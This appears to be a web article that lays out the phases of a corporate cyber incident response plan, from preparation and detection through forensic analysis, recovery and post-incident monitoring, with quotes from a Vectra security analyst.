It is essential that every organization is prepared for the worst. Hence the key to handle such a situation is prior- preparation, which involves identifying the start of an incident, how to recover, how to get everything back to normal, and creating established security policies including, but not limited to warning banners, user privacy expectations, established incident notification processes, the development of an incident containment policy, creation of incident handling checklists, ensuring the corporate disaster recovery plan is up to date, making sure the security risk assessment process is functioning and active.
There are other aspects that need consideration during the pre-deployed incident handling assets. When looking at your pre-deployed incident handling assets to assure the system protection during a system breach. This includes monitoring your own sensors, probes, and monitors on critical systems, tracking databases in core systems and completing active audit logs for all server network aspects and components.
“With a successful incident response program, damage can be mitigated or avoided altogether,” Morales says.
Many organizations are providing Incident Response Retainer solution through which a cyber security incident or data breach will be handled quickly and effectively.
“Enterprise architecture and systems engineering must be based on the assumption that systems or components have either been compromised or contain undiscovered vulnerabilities that could lead to undetected compromises. Additionally, missions and business functions must continue to operate in the presence of compromise.”
The capabilities of an IR program are often measured on the level of an organization’s maturity, which define the proactive attitude of an organization. Companies that are able to map policies to the level of risk appropriate to the business are better prepared in the event of a security incident.
Incident Response planning system
- Cyber incident report planning: Preparation is the key to effective incident response. Even the best incident response team cannot effectively address an incident without predetermined guidelines. A strong plan must be in place to support the working team. In order to successfully address security events, these features must be included in an incident response plan:
Develop and Document Incident Reporting Policies: Establish policies, procedures, and agreements for incident response management.
Define Communication Guidelines: Create communication standards and guidelines to enable seamless communication during and after an incident.
Conduct Dummy Cyber Hunting Exercises: Conduct operational threat hunting exercises to find incidents occurring within your environment. This allows for a more proactive incident response.
Assessing Threat Detection Capability: Assess your current threat detection capability and update risk assessment and improvement programs.
- Incident detection This phase is also known as the Discovery phase. The focus of this phase is to monitor security events in order to detect, alert, and report on potential security incidents.
Monitor: Monitor security events in your environment using firewalls, intrusion prevention systems, and data loss prevention.
Detect: Detect potential security incidents by correlating alerts within a SIEM solution.
Alert: Analysts create an incident ticket, document initial findings, and assign an initial incident classification.
Report: Your reporting process should include accommodation for regulatory reporting escalations.
- Remediation The bulk of the effort in properly scoping and understanding the security incident takes place during this step. Resources should be utilized to collect data from tools and systems for further analysis and to identify indicators of compromise. Individuals should have in-depth skills and a detailed understanding of live system responses, digital forensics, memory analysis, and malware analysis. As evidence is collected, analysts should focus on three primary areas:
2. Determine what tracks may have been left behind by the threat actor.
3. Gather the artifacts needed to build a timeline of activities
Different analysis tools can be taken into account as below
Binary Analysis: Investigate malicious binaries or tools leveraged by the attacker and document the functionalities of those programs. This analysis is performed in two ways.
Behavioral Analysis: Execute the malicious program in a VM to monitor its behavior
Static Analysis: Reverse engineer the malicious program to scope out the entire functionality.
Enterprise Hunting: Analyze existing systems and event log technologies to determine the scope of compromise.
Packet and Traffic reconstructors: This tool is often bundled with Network traffic monitor. These tools reconstruct files back into the network, capturing the static image of the network and associated traffic.
Trace Route and Whois Tool: This tool helps in tracing an intruder to the location of the source computer.
- Recovery This is one of the most critical stages of incident response. The strategy to be prepared for Recovery is based on the intelligence and indicators of compromise gathered during the analysis phase. After the system is restored and security is verified, normal operations can resume.
Coordinated Shutdown: Once all systems within the environment have been identified, those have been compromised by a threat actor; perform a coordinated shutdown of these devices. A notification must be sent to all IR team members to ensure proper timing.
Wipe and Rebuild: Wipe the infected devices and rebuild the operating system from the ground up. Change passwords of all compromised accounts.
Threat Mitigation Requests: If you have identified domains or IP addresses that are known to be leveraged by threat actors for command and control, issue threat mitigation requests to block the communication from all egress channels connected to these domains.
5. Restoration: There is more work to be done after the incident is resolved. Be sure to properly document any information that can be used to prevent similar occurrences in the future.
Incident Report completion: Documenting the incident will help to improve the incident response plan and augment additional security measures to avoid such security incidents in the future.
Monitor Post-Incident: Closely monitor for activities post-incident since threat actors will reappear again. We recommend a security log hawk analyzing SIEM data for any signs of indicators tripping that may have been associated with the prior incident.
Identify preventative measures: Create new security initiatives to prevent future incidents.
Gain Cross-Functional Buy-In: Coordinating across the organization is critical to the proper implementation of new security initiatives
Having an IR plan in place is a critical part of a successful security program. Its purpose is to establish and test clear measures that an organization could and likely should take to reduce the impact of a breach from external and internal threats.
“While not every attack can be prevented, an organization’s IR stance should emphasize anticipation, agility, and adaptation”, says Chris Morales, head of security analytics at Vectra.